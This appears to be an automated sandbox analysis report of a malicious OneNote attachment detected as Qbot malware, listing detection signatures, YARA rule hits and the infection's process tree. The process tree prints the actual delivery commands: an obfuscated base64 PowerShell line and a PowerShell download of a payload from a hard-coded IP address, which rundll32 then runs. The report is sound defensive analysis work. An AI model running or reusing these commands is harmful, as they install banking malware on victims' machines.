Windows
Analysis Report
Funds_160151.one
Overview
General Information
Detection
Qbot
Field | Value
---|---
Score | 100
Range | 0 - 100
Whitelisted | false
Confidence | 100%
Signatures
Yara detected Qbot
DLL reload attack detected
Malicious sample detected (through community Yara rule)
Sigma detected: Execute DLL with spoofed extension
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Allocates memory in foreign processes
Powershell drops PE file
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Creates a start menu entry (Start Menu\Programs\Startup)
PE file overlay found
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64native
- ONENOTE.EXE (PID: 6420 cmdline: C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Funds_160151.one MD5: 59056F600C4366EE07277C20A90DAF67)
- ONENOTEM.EXE (PID: 5280 cmdline: /tsr MD5: 377069572D48FFBF1EA2DA466A61B398)
- cmd.exe (PID: 376 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- powershell.exe (PID: 7132 cmdline: powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg==')) MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 1868 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\1.cmd nd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- powershell.exe (PID: 7252 cmdline: powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg'); MD5: 04029E121A0CFA5991749937DD22A1D9)
- rundll32.exe (PID: 4180 cmdline: rundll32 C:\programdata\gb.jpg,Wind MD5: EF3179D498793BF4234F708D3BE28633)
- rundll32.exe (PID: 4260 cmdline: rundll32 C:\programdata\gb.jpg,Wind MD5: 889B99C52A60DD49227C5E485A016679)
- backgroundTaskHost.exe (PID: 3124 cmdline: C:\Windows\SysWOW64\backgroundTaskHost.exe MD5: F290D12F0351B56708B3DF1EC26CB45B)
- ONENOTEM.EXE (PID: 7188 cmdline: "C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr MD5: 377069572D48FFBF1EA2DA466A61B398)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| | Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth (Nextron Systems) | |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | |
| | Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth (Nextron Systems) | |
| | Suspicious_PowerShell_WebDownload_1 | Detects suspicious PowerShell code that downloads from web sites | Florian Roth (Nextron Systems) | |
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | |
| | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | |
| | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security | |

Data Obfuscation
Source: | Author: Joe Security
No Snort rule has matched
Source: | Binary string:
Source: | Binary string:
Source: | Binary string:
Source: | Binary string:
Source: | Code function: 15_2_1000C547
Software Vulnerabilities
Source: | Process created:
Source: | ASN Name:
Source: | HTTP traffic detected:
Source: | HTTP traffic detected: